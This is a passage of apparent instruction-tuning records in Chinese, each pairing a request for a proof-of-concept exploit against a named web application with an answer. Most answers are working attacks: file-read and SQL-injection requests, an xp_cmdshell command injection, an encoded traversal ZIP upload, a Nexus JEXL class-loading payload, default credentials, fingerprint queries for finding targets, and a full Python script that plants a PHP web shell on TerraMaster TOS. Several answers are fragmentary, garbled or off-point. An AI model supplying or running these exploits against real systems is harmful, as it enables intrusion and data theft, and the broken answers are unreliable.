  607. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:久其财务报表 download.jsp 任意文件读取漏洞\n漏洞描述:久其财务报表 download.jsp 存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的信息\n影响版本:``` 久其财务报表 ```\n网络测绘:``` body=\"/netrep/\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. body=\"/netrep/\"\n2. POST /netrep/ebook/browse/download.jsp HTTP/1.1\nHost: \nContent-Length: 55\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://114.251.113.53:7002\nContent-Type: application/x-www-form-urlencoded\n\njpgfilepath=c:\\windows\\win.ini\n3. Content-Length: 55\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/久其财务报表 download.jsp 任意文件读取漏洞.md"}
    608. 

  608. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:天融信 TopApp-LB SQL注入漏洞\n漏洞描述:天融信负载均衡 TopAPP-LB产品旧版本在管理面存在SQL注入漏洞,具体为在可以访问管理服务情况 下,攻击者通过构造恶意请求,利用系统检查输入条件不严格的缺陷,进一步可获取部分系统本地信息\n影响版本:``` 天融信负载均衡TopApp-LB ```\n网络测绘:``` app=\"天融信-TopApp-LB-负载均衡系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 天融信负载均衡TopApp-LB\n2. app=\"天融信-TopApp-LB-负载均衡系统\"\n3. POST /acc/clsf/report/datasource.php HTTP/1.1\nHost: \nConnection: close\nAccept: text/javascript, text/html, application/xml, text/xml, */*\nX-Prototype-Version: 1.6.0.3\nX-Requested-With: XMLHttpRequest\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 201\n\nt=l&e=0&s=t&l=1&vid=2147483647 or 1=1&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/天融信 TopApp-LB SQL注入漏洞.md"}
    609. 

  609. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:明源云 ERP系统 接口管家 ApiUpdate.ashx 任意文件上传漏洞\n漏洞描述:明源云 ERP系统接口管家 ApiUpdate.ashx 文件存在任意文件上传漏洞,攻击者通过构造特殊的ZIP压缩包可以上传任意文件,控制服务器\n影响版本:明源云 ERP系统接口管家\n网络测绘:``` \"接口管家站点正常!\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. \"接口管家站点正常!\"\n2. POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1\nHost: \nAccept-Encoding: gzip\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\nContent-Length: 856\n\n{{hexdec(504B030414000000080063740E576AE37B2383000000940000001D0000002E2E2F2E2E2F2E2E2F666463636C6F75642F5F2F746573742E6173707825CC490AC2401404D0BDA7685A02C9A62F90288A22041C42E2B0FE4A11033DD983E0EDFDE2AEA8575453AC444723C49EEC98392CE4662E45B16C185AE35D48E24806D1D3836DF8C404A3DAD37F227A066723D42D4C09A53C23A66BD65656F56ED2505B68703F20BC11D4817C47E959F678651EAA4BD06A7D8F4EE7841F5455CDB7B32F504B0102140314000000080063740E576AE37B2383000000940000001D00000000000000000000008001000000002E2E2F2E2E2F2E2E2F666463636C6F75642F5F2F746573742E61737078504B050600000000010001004B000000BE0000000000)}}\n3. /fdccloud/_/test.aspx\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/明源云 ERP系统 接口管家 ApiUpdate.ashx 任意文件上传漏洞.md"}
    610. 

  610. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:GhostScript 沙箱绕过(命令执行)漏洞 CVE-2018-16509\n漏洞描述:Ghostscript是一套建基于Adobe、PostScript及可移植文档格式(PDF)的页面描述语言等而编译成的免费软件。 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞: - http://seclists.org/oss-sec/2018/q3/142 - https://bugs.chromium.org/p/project-zero/issues/detail?id=1640 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2018-16509\n【POC利用方法】\n1. docker-compose up -d\n2. GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。\n3. 环境启动后,访问`http://your-ip:8080`将可以看到一个上传组件。\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/GhostScript 沙箱绕过(命令执行)漏洞 CVE-2018-16509.md"}
    611. 

  611. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Jira Server 及 Data Center 信息泄露漏洞 CVE-2020-14179\n漏洞描述:Atlassian JIRA Server是澳大利亚Atlassian公司的一套缺陷跟踪管理系统的服务器版本。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。Atlassian JIRA Data Center是Atlassian JIRA的数据中心版本。 Atlassian JIRA Server和Data Center 8.5.8之前版本、8.6.0至8.11.1之前版本的/secure/QueryComponent!Default.jspa端点存在信息泄露漏洞。未经身份认证的远程攻击者可利用该漏洞查看自定义字段名称和自定义SLA名称。\n影响版本:``` Atlassian JIRA Server < 8.5.8 Atlassian JIRA Server 8.6.0<= Version <8.11.1 Atlassian JIRA Data Center < 8.5.8 Atlassian JIRA Data Center 8.6.0<= Version <8.11.1 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-14179\n【POC利用方法】\n1. Atlassian JIRA Server < 8.5.8\nAtlassian JIRA Server 8.6.0<= Version <8.11.1\nAtlassian JIRA Data Center < 8.5.8\nAtlassian JIRA Data Center 8.6.0<= Version <8.11.1\n2. /secure/QueryComponent!Default.jspa\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Jira Server 及 Data Center 信息泄露漏洞 CVE-2020-14179.md"}
    612. 

  612. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:TerraMaster TOS makecvs.php 远程命令执行漏洞 CVE-2020-28188\n漏洞描述:TerraMaster TOS 4.2.06 以下中 makecvs.php 存在任意文件写入,攻击者可以上传恶意文件控制服务器\n影响版本:``` TerraMaster TOS < 4.2.06 ```\n网络测绘:``` \"TerraMaster\" && header=\"TOS\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-28188\n【POC利用方法】\n1. TerraMaster TOS < 4.2.06\n2. \"TerraMaster\" && header=\"TOS\"\n3. # Exploit Title: TerraMaster TOS 4.2.06 - RCE (Unauthenticated)\n# Date: 12/12/2020\n# Exploit Author: IHTeam\n# Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/\n# Vendor Homepage: https://www.terra-master.com/\n# Version: <= 4.2.06\n# Tested on: 4.1.30, 4.2.06\n\n#!/usr/bin/env python3\nimport argparse\nimport requests\nimport time\nimport sys\nimport urllib.parse\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nparser = argparse.ArgumentParser(description=\"TerraMaster TOS <= 4.2.06 Unauth RCE\")\nparser.add_argument('--url', action='store', dest='url', required=True, help=\"Full URL and port e.g.: http://192.168.1.111:8081/\")\nargs = parser.parse_args()\n\nurl = args.url\nheaders = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}\nepoch_time = int(time.time())\nshell_filename = \"debug\"+str(epoch_time)+\".php\"\n\ndef check_endpoint(url, headers):\n\tresponse = requests.get(url+'/version', headers=headers, verify=False)\n\tif response.status_code == 200:\n\t\tprint(\"[+] TerraMaster TOS version: \", str(response.content))\n\telse:\n\t\tprint(\"\\n[-] TerraMaster TOS response code: \", response.status_code)\n\t\tsys.exit()\n\t\t\ndef upload_shell(url, headers, shell_filename):\n\tpayload = \"http|echo \\\"<?php echo(passthru(\\\\$_GET['cmd']));?>\\\" >> /usr/www/\"+shell_filename+\" && chmod +x /usr/www/\"+shell_filename+\"||\"\n\tpayload = urllib.parse.quote(payload, safe='')\n\tprint(\"[/] Uploading shell...\")\n\tresponse = requests.get(url+'/include/makecvs.php?Event='+payload, headers=headers, verify=False)\n\ttime.sleep(1)\n\tresponse = requests.get(url+'/'+shell_filename+'?cmd=cat /etc/passwd', headers=headers, verify=False)\n\tif ('root:' in str(response.content, 'utf-8')):\n\t\tprint(\"[+] Upload succeeded\")\n\telse:\n\t\tprint(\"\\n[-] Error uploading shell: \", response.content)\n\t\tsys.exit()\n\ndef interactive_shell(url, headers, shell_filename, cmd):\n\tresponse = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(cmd, safe=''), headers=headers, verify=False)\n\tprint(str(response.text)+\"\\n\")\n\n\ndef delete_shell(url, headers, shell_filename):\n\tdelcmd = \"rm /usr/www/\"+shell_filename\n\tresponse = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(delcmd, safe=''), headers=headers, verify=False)\n\tprint(\"\\n[+] Shell deleted\")\n\nupload_shell(url, headers, shell_filename)\ntry:\n\twhile True:\n\t\tcmd = input(\"# \")\n\t\tinteractive_shell(url, headers, shell_filename, cmd)\nexcept:\n\tdelete_shell(url, headers, shell_filename)\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/TerraMaster TOS makecvs.php 远程命令执行漏洞 CVE-2020-28188.md"}
    613. 

  613. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Nexus Repository Manger extdirect 远程命令执行 CVE-2019-7238\n漏洞描述:近日,研究人员发现了通用软件包仓库管理服务 Nexus Repository Manager 3 存在访问控制缺失及远程代码执行漏洞,漏洞编号为 CVE-2019-7238\n影响版本:``` Nexus < 3.14.0 ```\n网络测绘:app=\"Nexus-Repository-Manager\"\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2019-7238\n【POC利用方法】\n1. Nexus < 3.14.0\n2. POST /service/extdirect HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0\nAccept: */*\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 7256\nConnection: close\n\n{\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"function(x, y, z, c, integer, defineClass){   c=1.class.forName('java.lang.Character');   integer=1.class;   x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055';   y=0;   z='';   while (y lt x.length()){       z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0];       y += 2;   };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \\ndefineClass.setAccessible(true);\\nx=defineClass.invoke(\\n    y,\\n   'Exploit.Test234',\\n    z.getBytes('latin1'),    0,\\n    3054\\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\\n\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"}\n3. Connection: close\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Nexus Repository Manger extdirect 远程命令执行 CVE-2019-7238.md"}
    614. 

  614. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Adminer 远程文件读取 CVE-2021-43008\n漏洞描述:Adminer是一个PHP编写的开源数据库管理工具,支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。 在其版本1.12.0到4.6.2之间存在一处因为MySQL LOAD DATA LOCAL导致的文件读取漏洞。 参考链接: - https://github.com/p0dalirius/CVE-2021-43008-AdminerRead - http://sansec.io/research/adminer-4.6.2-file-disclosure-vulnerability\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-43008\n【POC利用方法】\n1. docker compose up -d\n2. 使用[mysql-fake-server](https://github.com/4ra1n/mysql-fake-server)启动一个恶意的MySQL服务器。\n3. 服务启动后,在`http://your-ip:8080`即可查看到Adminer的登录页面。\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Adminer 远程文件读取 CVE-2021-43008.md"}
    615. 

  615. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Coremail 配置信息泄露漏洞\n漏洞描述:Coremail 某个接口存在配置信息泄露漏洞,其中存在端口,配置信息等\n影响版本:``` Coremail 配置信息泄露漏洞 ```\n网络测绘:``` app=\"Coremail邮件系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. Coremail 配置信息泄露漏洞\n2. app=\"Coremail邮件系统\"\n3. http://xxx.xxx.xxx.xxx/mailsms/s?func=ADMIN:appState&dumpConfig=/\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Coremail 配置信息泄露漏洞.md"}
    616. 

  616. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:绿盟 UTS综合威胁探针 信息泄露登陆绕过漏洞\n漏洞描述:绿盟 UTS综合威胁探针 某个接口未做授权导致未授权漏洞\n影响版本:``` 绿盟 UTS综合威胁探针 ```\n网络测绘:``` app=\"NSFOCUS-UTS综合威胁探针\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 绿盟 UTS综合威胁探针\n2. app=\"NSFOCUS-UTS综合威胁探针\"\n3. admin/Nsfocus@123\nauditor/auditor\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/绿盟 UTS综合威胁探针 信息泄露登陆绕过漏洞.md"}
    617. 

  617. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:企望制造 ERP comboxstore.action 远程命令执行漏洞\n漏洞描述:企望制造 ERP comboxstore.action接口存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令\n影响版本:企望制造 ERP\n网络测绘:``` title=\"企望制造ERP系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title=\"企望制造ERP系统\"\n2. POST /mainFunctions/comboxstore.action HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nHost: \n\ncomboxsql=exec%20xp_cmdshell%20'type%20C:\\Windows\\Win.ini'\n3. Content-Type: application/x-www-form-urlencoded\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/企望制造 ERP comboxstore.action 远程命令执行漏洞.md"}
    618. 

  618. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Bitbucket 登录绕过漏洞\n漏洞描述:此错误已修复并部署在 Bitbucket Server > 4.8 上。Bitbucket 由 Atlassian 团队开发。其中出现了一个通过 %20 绕过权限的漏洞,导致任意用户可获取敏感数据\n影响版本:``` Bitbucket Server > 4.8 ```\n网络测绘:``` title=\"Log in - Bitbucket\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. Bitbucket Server > 4.8\n2. title=\"Log in - Bitbucket\"\n3. /admin%20/mail-server\n/admin%20/db\n/admin%20/db/edit\n/admin%20/license\n/admin%20/logging\n/admin%20/server-settings\n/admin%20/authentication\n/admin%20/avatars\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Bitbucket 登录绕过漏洞.md"}
    619. 

  619. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:IBOS 数据库模块 后台任意文件上传漏洞\n漏洞描述:IBOS 后台数据库模块 存在任意文件上传漏洞,攻击者进入后台后可以上传恶意文件控制服务器\n影响版本:``` IBOS < 4.5.5 ```\n网络测绘:``` body=\"IBOS\" && body=\"login-panel\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. IBOS < 4.5.5\n2. body=\"IBOS\" && body=\"login-panel\"\n3. http://xxx.xxx.xxx.xxx/?r=dashboard/default/login\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/IBOS 数据库模块 后台任意文件上传漏洞.md"}
    620. 

  620. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638\n漏洞描述:紫光软件系统有限公司(以下简称“紫光软件”)是中国领先的行业解决方案和IT服务提供商。 紫光电子档案管理系统存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。\n影响版本:``` 紫光电子档案管理系统 ```\n网络测绘:``` app=\"紫光档案管理系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"紫光档案管理系统\"\n2. /login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1)))\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638.md"}
    621. 

  621. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:imo 云办公室 Imo_DownLoadUI.php 任意文件下载漏洞\n漏洞描述:imo 云办公室 由于 /file/Placard/upload/Imo_DownLoadUI.php 页面 filename 参数过滤不严,导致可以读取系统敏感文件。\n影响版本:``` imo 云办公室 ```\n网络测绘:``` app=\"iMO-云办公室\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"iMO-云办公室\"\n2. /file/Placard/upload/Imo_DownLoadUI.php?cid=1&uid=1&type=1&filename=/OpenPlatform/config/kdBind.php\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/imo 云办公室 Imo_DownLoadUI.php 任意文件下载漏洞.md"}
    622. 

  622. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Nexus Repository Manager 3 未授权目录穿越漏洞 CVE-2024-4956\n漏洞描述:Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET 等软件源仓库。 其 3.68.0 及之前版本中,存在一处目录穿越漏洞。攻击者可以利用该漏洞读取服务器上任意文件。 参考链接: - https://support.sonatype.com/hc/en-us/articles/29416509323923-CVE-2024-4956-Nexus-Repository-3-Path-Traversal-2024-05-16\n影响版本:``` Sonatype Nexus Repository 3 < 3.68.1 ```\n网络测绘:``` app=\"Nexus-Repository-Manager\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2024-4956\n【POC利用方法】\n1. Sonatype Nexus Repository 3 < 3.68.1\n2. app=\"Nexus-Repository-Manager\"\n3. docker compose up -d\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Nexus Repository Manager 3 未授权目录穿越漏洞 CVE-2024-4956.md"}
    623. 

  623. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:imo 云办公室 corpfile.php 远程命令执行漏洞\n漏洞描述:imo 云办公室 corpfile.php 文件中参数过滤不足,导致可以随意进行命令拼接,获取服务器权限\n影响版本:``` imo 云办公室 ```\n网络测绘:``` app=\"iMO-云办公室\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"iMO-云办公室\"\n2. <?php\ndefine('DELETE_FAILED', '数据不存在,删除失败!');\ndefine('DELETE_SUCCESS', '数据存在,删除成功!');\nswitch($_POST['type'])\n{\n  case 'corpLogo':\n    $checkFile = exec('ls ' . $_POST['file']);\n    $result = exec($_POST['command']);\n    echo json_encode(array('cid' => $_POST['cid'], 'account' => $_POST['account'], 'command' => $_POST['command'], 'file' => (($checkFile && !$result) ? DELETE_SUCCESS : DELETE_FAILED)));\n  break;\n\n  case 'userLogo':\n    $checkFile = exec('ls ' . $_POST['file']);\n    $result = exec($_POST['command']);\n    echo json_encode(array('uid' => $_POST['uid'], 'user_account' => $_POST['user_account'], 'command' => $_POST['command'], 'file' => (($checkFile && !$result) ? DELETE_SUCCESS : DELETE_FAILED)));\n  break;\n\n  case 'corpTemp':\n    $checkFile = exec('ls ' . $_POST['file']);\n    $result = exec($_POST['command']);\n    echo json_encode(array('cid' => $_POST['cid'], 'account' => $_POST['account'], 'command' => $_POST['command'], 'file' => (($checkFile && !$result) ? DELETE_SUCCESS : DELETE_FAILED)));\n  break;\n\n  case 'chatLog':\n    $checkFile = exec('ls ' . $_POST['file']);\n    $result = exec($_POST['command']);\n    echo json_encode(array('cid' => $_POST['cid'], 'account' => $_POST['account'], 'command' => $_POST['command'], 'file' => (($checkFile && !$result) ? DELETE_SUCCESS : DELETE_FAILED)));\n  break;\n\n  case 'multiChatLog':\n    $checkFile = exec('ls ' . $_POST['file']);\n    $result = exec($_POST['command']);\n    echo json_encode(array('cid' => $_POST['cid'], 'account' => $_POST['account'], 'command' => $_POST['command'], 'file' => (($checkFile && !$result) ? DELETE_SUCCESS : DELETE_FAILED)));\n  break;\n\n  case 'groupChatLog':\n    $checkFile = exec('ls ' . $_POST['file']);\n    $result = exec($_POST['command']);\n    echo json_encode(array('cid' => $_POST['cid'], 'account' => $_POST['account'], 'command' => $_POST['command'], 'file' => (($checkFile && !$result) ? DELETE_SUCCESS : DELETE_FAILED)));\n  break;\n\n  case 'backChatLog':\n    $checkFile = exec('ls ' . $_POST['file']);\n    $result = exec($_POST['command']);\n    echo json_encode(array('cid' => $_POST['cid'], 'account' => $_POST['account'], 'command' => $_POST['command'], 'file' => (($checkFile && !$result) ? DELETE_SUCCESS : DELETE_FAILED)));\n  break;\n}\n3. POST /corpfile.php\n\ntype=corpLogo&command=id&file=;pwd>1.txt\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/imo 云办公室 corpfile.php 远程命令执行漏洞.md"}
    624. 

